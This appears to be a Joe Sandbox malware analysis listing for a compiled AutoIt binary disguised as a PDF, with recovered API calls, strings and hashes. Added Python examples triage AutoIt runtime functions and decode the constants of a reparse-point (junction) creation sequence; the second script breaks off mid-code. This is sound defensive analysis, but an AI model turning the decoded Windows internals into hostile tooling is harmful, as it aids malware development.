                                                                                                                      • GetLastError.KERNEL32(00000001,00000000), ref: 007C53E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3215588206-0
                                                                                                                      • Opcode ID: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                                                                                                                      • Instruction ID: 9deaa2ff084abe0c47814e5335f8f0ad7ffd8fca40318487451f43eb41be6795
                                                                                                                      • Opcode Fuzzy Hash: 485c12c016353df056736d3db255fc47cecfadfd20b266cb51e48a47ff8414d8
                                                                                                                      • Instruction Fuzzy Hash: 43415170E04319AADB109FBA8C49D6FFFB8EF51B50B10452FE509E7290DAB8A541CE61
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 007AAAA5
                                                                                                                      • __swprintf.LIBCMT ref: 007AAB46
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAB59
                                                                                                                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 007AABAE
                                                                                                                      • _wcscmp.LIBCMT ref: 007AABEA
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 007AAC21
                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 007AAC73
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 007AACA9
                                                                                                                      • GetParent.USER32(?), ref: 007AACC7
                                                                                                                      • ScreenToClient.USER32(00000000), ref: 007AACCE
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 007AAD48
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAD5C
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 007AAD82
                                                                                                                      • _wcscmp.LIBCMT ref: 007AAD96
                                                                                                                        • Part of subcall function 0077386C: _iswctype.LIBCMT ref: 00773874
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                      • String ID: %s%u
                                                                                                                      • API String ID: 3744389584-679674701
                                                                                                                      • Opcode ID: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                                                                                                                      • Instruction ID: bbf00f554eb58eef581c465f48a335ed4c3e36ef6635566e12d724182ac4a7cf
                                                                                                                      • Opcode Fuzzy Hash: 97ff642242b3e1b97310f6e6a9fd62a61926b8b63a3f5e37db90ce14424076f2
                                                                                                                      • Instruction Fuzzy Hash: 78A1CE71205306FBDB18DF24C884BEAB7E8FF85355F008629F999D2590D738E945CBA2
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(00000008,?,00000400), ref: 007AB3DB
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB3EC
                                                                                                                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 007AB414
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 007AB431
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB44F
                                                                                                                      • _wcsstr.LIBCMT ref: 007AB460
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB498
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB4A8
                                                                                                                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 007AB4CF
                                                                                                                      • GetClassNameW.USER32(00000018,?,00000400), ref: 007AB518
                                                                                                                      • _wcscmp.LIBCMT ref: 007AB528
                                                                                                                      • GetClassNameW.USER32(00000010,?,00000400), ref: 007AB550
                                                                                                                      • GetWindowRect.USER32(00000004,?), ref: 007AB5B9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                      • String ID: @$ThumbnailClass
                                                                                                                      • API String ID: 1788623398-1539354611
                                                                                                                      • Opcode ID: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                                                                                                                      • Instruction ID: 206420b42ffddcba62319ce58d1a498245173ef1189d2811283cde36adf1c820
                                                                                                                      • Opcode Fuzzy Hash: ae8c8433e30a36d58070e30d409b537d656604f0a5d02214649693913b6b2350
                                                                                                                      • Instruction Fuzzy Hash: B581A0710083459BDB04DF50C885FAA7BE8FF85714F04866AFD899A0A3DB38DD49CBA1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                      • API String ID: 1038674560-1810252412
                                                                                                                      • Opcode ID: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                                                                                                                      • Instruction ID: 6353035a3358a954f2a415de57fea5df77be3551265b02b1a4f0a832d718f060
                                                                                                                      • Opcode Fuzzy Hash: 754a8317e6190280cd4a412bec9720c9c68e1d1053f064aaa79285eac319ba29
                                                                                                                      • Instruction Fuzzy Hash: 8831AD32A04209E6DB14EA60DD47AEE77A8BF21751F604229F8A1B11D3EF9E6E08C551
APIs
• LoadIconW.USER32(00000063), ref: 007AC4D4
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007AC4E6
• SetWindowTextW.USER32(?,?), ref: 007AC4FD
• GetDlgItem.USER32(?,000003EA), ref: 007AC512
• SetWindowTextW.USER32(00000000,?), ref: 007AC518
• GetDlgItem.USER32(?,000003E9), ref: 007AC528
• SetWindowTextW.USER32(00000000,?), ref: 007AC52E
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 007AC54F
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 007AC569
• GetWindowRect.USER32(?,?), ref: 007AC572
• SetWindowTextW.USER32(?,?), ref: 007AC5DD
• GetDesktopWindow.USER32 ref: 007AC5E3
• GetWindowRect.USER32(00000000), ref: 007AC5EA
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 007AC636
• GetClientRect.USER32(?,?), ref: 007AC643
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 007AC668
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AC693
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
• Instruction ID: f1c26ca2a06b741d4f24205fd3c9ed8d5b4ed62bfdfb01bf916816f767346e52
• Opcode Fuzzy Hash: 08da9938697ee66f1357f9a3bb481b629981a1f062a080ee904d6f8fc5321e23
• Instruction Fuzzy Hash: 85516D70900709EFDB21DFA8DD89B6EBBF5FF44704F104A29E682A25A0D778E914CB54
APIs
• _memset.LIBCMT ref: 007DA4C8
• DestroyWindow.USER32(?,?), ref: 007DA542
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 007DA5BC
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 007DA5DE
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA5F1
• DestroyWindow.USER32(00000000), ref: 007DA613
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00750000,00000000), ref: 007DA64A
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007DA663
• GetDesktopWindow.USER32 ref: 007DA67C
• GetWindowRect.USER32(00000000), ref: 007DA683
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007DA69B
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 007DA6B3
  • Part of subcall function 007525DB: GetWindowLongW.USER32(?,000000EB), ref: 007525EC
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
• String ID: 0$tooltips_class32
• API String ID: 1297703922-3619404913
• Opcode ID: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
• Instruction ID: 11b2714402fd253fbf0af62c8026dbc57a7f9271379879de12d24506ea59791b
• Opcode Fuzzy Hash: f8159524776ff27a36e6a7d3f40c6eb2c33a50c2ca987a85665803f3c0232ba7
• Instruction Fuzzy Hash: A7715A71140205EFD710CF28C849FA67BF9FB88304F08492EF995872A1D779E955CB16
APIs
  • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
• DragQueryPoint.SHELL32(?,?), ref: 007DC917
  • Part of subcall function 007DADF1: ClientToScreen.USER32(?,?), ref: 007DAE1A
  • Part of subcall function 007DADF1: GetWindowRect.USER32(?,?), ref: 007DAE90
  • Part of subcall function 007DADF1: PtInRect.USER32(?,?,007DC304), ref: 007DAEA0
• SendMessageW.USER32(?,000000B0,?,?), ref: 007DC980
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC98B
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 007DC9AE
• _wcscat.LIBCMT ref: 007DC9DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 007DC9F5
• SendMessageW.USER32(?,000000B0,?,?), ref: 007DCA0E
• SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA25
• SendMessageW.USER32(?,000000B1,?,?), ref: 007DCA47
• DragFinish.SHELL32(?), ref: 007DCA4E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 007DCB41
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
• Instruction ID: f127aeeda094f59d1af222c14b7c115540e88c30b2047ac1f1b254d781001faa
• Opcode Fuzzy Hash: 81416c7a42706095794aeb01d2f84aaf579c65133aa08cd7725bf590ce9f1b56
• Instruction Fuzzy Hash: 30615A71508301AFC701DF64DC89D9BBBF9FF88710F004A2EF596962A1DB789A49CB52
APIs
• CharUpperBuffW.USER32(?,?), ref: 007D46AB
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D46F6
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Opcode ID: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
• Instruction ID: 388736a00d7e8ab7cd34d0d0895a6ecfd87f7b49d6c4cd969c18d10c44c917c8
• Opcode Fuzzy Hash: 59551273684a14693b7348e76b45a6f28b8e5736bbb560019c2cf8960b4bd74a
• Instruction Fuzzy Hash: C7918C34204701DFCB14EF20C855AAAB7A1AF95354F04886DF9965B3A2CB79FD0ACB91
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 007DBB6E
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,007D6D80,?), ref: 007DBBCA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC03
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 007DBC46
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 007DBC7D
• FreeLibrary.KERNEL32(?), ref: 007DBC89
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 007DBC99
• DestroyIcon.USER32(?), ref: 007DBCA8
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 007DBCC5
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 007DBCD1
  • Part of subcall function 0077313D: __wcsicmp_l.LIBCMT ref: 007731C6
Strings
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 1212759294-1154884017
• Opcode ID: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
• Instruction ID: dba31cae3a5e634bfa514fc1a9e4446207d4492149f31f4d54b8cbf6858185de
• Opcode Fuzzy Hash: 295c840fa44145a0259b06dc7a0ab31cc94255351642237b76d9c3850f2eba20
• Instruction Fuzzy Hash: 4161B171600619FAEB14DF64CC45FBE77B8FB08721F108116F919D62D1DBB8AA90DB60
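The entries above list, per recovered function, the Windows APIs it calls (direct calls and calls made by subroutines it invokes, marked "Part of subcall function") and, under Similarity, the string constants it references joined with "$". Several of those string sets are AutoIt interpreter strings: "[CLASS:", "[HANDLE:", "[REGEXPTITLE:", "[ACTIVE" and "[LAST" are AutoIt's advanced window-title syntax, "@GUI_DRAGFILE", "@GUI_DRAGID" and "@GUI_DROPID" are AutoIt GUI macros, and "CHECK", "COLLAPSE", "EXPAND", "GETITEMCOUNT", "ISCHECKED" and the rest are AutoIt ControlTreeView command names. The script below is an added example, not part of the Joe Sandbox report or its IDA plugin: it parses function entries in this layout from an excerpt condensed from the entries above, keeps direct and subcall API references apart, and tags each function whose strings match a small marker list as AutoIt runtime code, so an analyst can set that boilerplate aside and spend time on the functions that are not interpreter code. The marker list is an illustrative assumption, not an exhaustive signature.

```python
import re
from dataclasses import dataclass, field

# Excerpt condensed from the function entries of the report (same layout, fewer lines).
SAMPLE_LISTING = """\
APIs
• CharUpperBuffW.USER32(?,?), ref: 007D46AB
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007D46F6
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 3974292440-4258414348
• Instruction Fuzzy Hash: C7918C34204701DFCB14EF20C855AAAB7A1AF95354F04886DF9965B3A2CB79FD0ACB91
APIs
• DragQueryPoint.SHELL32(?,?), ref: 007DC917
  • Part of subcall function 007DADF1: ClientToScreen.USER32(?,?), ref: 007DAE1A
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 007DC98B
• DragFinish.SHELL32(?), ref: 007DCA4E
Strings
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Instruction Fuzzy Hash: 30615A71508301AFC701DF64DC89D9BBBF9FF88710F004A2EF596962A1DB789A49CB52
APIs
• LoadIconW.USER32(00000063), ref: 007AC4D4
• GetDesktopWindow.USER32 ref: 007AC5E3
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007AC693
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Instruction Fuzzy Hash: 85516D70900709EFDB21DFA8DD89B6EBBF5FF44704F104A29E682A25A0D778E914CB54
"""

# AutoIt runtime markers (assumption for this example; illustrative, not exhaustive):
# advanced WinTitle syntax, GUI drag-and-drop macros, ControlTreeView command names.
AUTOIT_MARKERS = {
    "[CLASS:", "[HANDLE:", "[REGEXPTITLE:", "[ACTIVE", "[LAST", "[ALL",
    "@GUI_DRAGFILE", "@GUI_DRAGID", "@GUI_DROPID",
    "GETITEMCOUNT", "GETTOTALCOUNT", "ISCHECKED", "GETSELECTED",
}

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR", optionally prefixed
# with "Part of subcall function XXXXXXXX:" for calls made by a callee.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(\w+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)"
)
# "• Key Name: value" lines of the Similarity block.
FIELD_LINE = re.compile(r"^•\s*([A-Za-z ]+):\s*(.*)$")
SECTION_HEADERS = {"APIs", "Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"}


@dataclass(frozen=True)
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: bool  # True when the call belongs to a callee, not this function


@dataclass
class FunctionEntry:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)


def parse_listing(text):
    """Split a function listing into FunctionEntry objects; each "APIs" header starts a new entry."""
    entries, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTION_HEADERS:
            if line == "APIs":
                current = FunctionEntry()
                entries.append(current)
            section = line
            continue
        if current is None or not line.startswith("•"):
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                name, module, args, ref = m.groups()
                current.apis.append(ApiCall(name, module, args or "", ref, "Part of subcall" in line))
        elif section == "Similarity":
            m = FIELD_LINE.match(line)
            if m:
                key, value = m.group(1).strip(), m.group(2).strip()
                current.fields[key] = value
                if key == "String ID":
                    current.strings = [s for s in value.split("$") if s]
    return entries


def autoit_markers(entry):
    """Markers from AUTOIT_MARKERS that prefix any string the function references."""
    return sorted({m for m in AUTOIT_MARKERS for s in entry.strings if s.startswith(m)})


def triage(entries):
    """Summarise each function with its direct APIs and a verdict: AutoIt runtime code or worth review."""
    report = []
    for e in entries:
        hits = autoit_markers(e)
        report.append({
            "api_id": e.fields.get("API ID", ""),
            "apis": sorted({a.name for a in e.apis if not a.subcall}),
            "subcall_apis": sorted({a.name for a in e.apis if a.subcall}),
            "strings": e.strings,
            "autoit_markers": hits,
            "verdict": "autoit-runtime" if hits else "review",
        })
    return report


if __name__ == "__main__":
    for row in triage(parse_listing(SAMPLE_LISTING)):
        print(f"{row['verdict']:15} {row['api_id'][:40]:40} markers={row['autoit_markers']}")
```

Functions that reference AutoIt strings are interpreter code shipped with every compiled AutoIt binary; the malicious logic lives in the embedded script and in whatever it injects, so the "review" bucket (here the dialog-setup function, which references no strings at all) is where to spend analysis time. Subcall APIs are kept separate because attributing a callee's GetWindowLongW or PtInRect to the caller inflates the caller's API profile and skews similarity comparisons.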
APIs
• LoadStringW.USER32(00000066,?,00000FFF,007DFB78), ref: 007BA0FC
  • Part of subcall function 00757F41: _memmove.LIBCMT ref: 00757F82
• LoadStringW.USER32(?,?,00000FFF,?), ref: 007BA11E
• __swprintf.LIBCMT ref: 007BA177
• __swprintf.LIBCMT ref: 007BA190
• _wprintf.LIBCMT ref: 007BA246
• _wprintf.LIBCMT ref: 007BA264
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%~
                                                                                                                      • API String ID: 311963372-3531514502
                                                                                                                      • Opcode ID: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                                                                                                                      • Instruction ID: 54a5c8d3c9ad43912aa65394f23f2675a0629e137153cfa7e3b67b9779da7a04
                                                                                                                      • Opcode Fuzzy Hash: 9fc1e7de646263b00eee6c025c5fe2d46df9b9a52af9109eb1b2cec47aa1a674
                                                                                                                      • Instruction Fuzzy Hash: 75517C71900209FACF19EBE0DD8AEEEB779BF04301F104165F805A21A1EB796F59DB61
APIs
  • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
  • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
• CharLowerBuffW.USER32(?,?), ref: 007BA636
• GetDriveTypeW.KERNEL32 ref: 007BA683
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA6CB
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA702
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007BA730
  • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 2698844021-4113822522
• Opcode ID: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
• Instruction ID: 8260efd39adad0c3bd6995d6d910d901cef0e2a96ff99080df74c46aaf77a255
• Opcode Fuzzy Hash: 3159521f21191b3344d95cdb7c035978af21bf9abb46c321b70c939b2991eb75
• Instruction Fuzzy Hash: 1E512871104304DFC704EF20D8859AAB7B4FF94719F04896DF89697291DB79EE0ACB52
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007BA47A
• __swprintf.LIBCMT ref: 007BA49C
• CreateDirectoryW.KERNEL32(?,00000000), ref: 007BA4D9
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007BA4FE
• _memset.LIBCMT ref: 007BA51D
• _wcsncpy.LIBCMT ref: 007BA559
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007BA58E
• CloseHandle.KERNEL32(00000000), ref: 007BA599
• RemoveDirectoryW.KERNEL32(?), ref: 007BA5A2
• CloseHandle.KERNEL32(00000000), ref: 007BA5AC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1672512620.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
• Associated: 00000000.00000002.1672473105.0000000000750000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.00000000007DF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672762806.0000000000805000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672803107.000000000080F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1672816894.0000000000818000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_750000_Genesis RMS Private Limited November 2024 pdf.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
• String ID: :$\$\??\%s
• API String ID: 2733774712-3457252023
• Opcode ID: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
• Instruction ID: eecf243ec47967a34e4a39fda1c5db1394a5ff7b633b3cd5dbfc0c2adf8a179f
• Opcode Fuzzy Hash: 7312a74735550501d376482329739c6cf03ffc4e5285ab46824f19425fa62efc
• Instruction Fuzzy Hash: 5631AEB1500219BBDB209FA0DC48FEB37BCEF88741F1080B6F909D2160E77897548B29
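The numeric arguments in the function above are worth decoding rather than reading past: CreateFileW is called with dwDesiredAccess 40000000 (GENERIC_WRITE), dwCreationDisposition 00000003 (OPEN_EXISTING) and dwFlagsAndAttributes 02200000 (FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, the combination needed to open a directory handle), and the DeviceIoControl code 000900A4 is FSCTL_SET_REPARSE_POINT. Together with the "\??\%s" NT path prefix in the string list, the CreateDirectoryW before the open and the RemoveDirectoryW on the second exit path, this is consistent with creating an NTFS reparse point (a junction) on a freshly created directory and cleaning it up on failure. Since the report classifies the binary as a compiled AutoIt script, this is most likely runtime library code rather than the script's own logic. The Python below is an added example written for this page, not Joe Sandbox or AutoIt code: it parses call-site lines in the format the report renders (format assumed from the lines above), decodes the CreateFileW arguments and the IOCTL with constants from the Windows SDK headers, and flags the open-directory-then-set-reparse-point sequence. The function names (parse_api_line, decode_ioctl, sets_reparse_point) are the example's own.

```python
import re
from typing import Optional

# Windows SDK constants (winnt.h, fileapi.h, winioctl.h); only the subset
# needed to read the call sites in this listing. Anything else decodes to hex.
GENERIC_ACCESS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                      4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
FILE_FLAGS = {
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",  # act on the link, not its target
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",    # required to open a directory
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
}
DEVICE_TYPES = {0x9: "FILE_DEVICE_FILE_SYSTEM"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}
KNOWN_FSCTL = {
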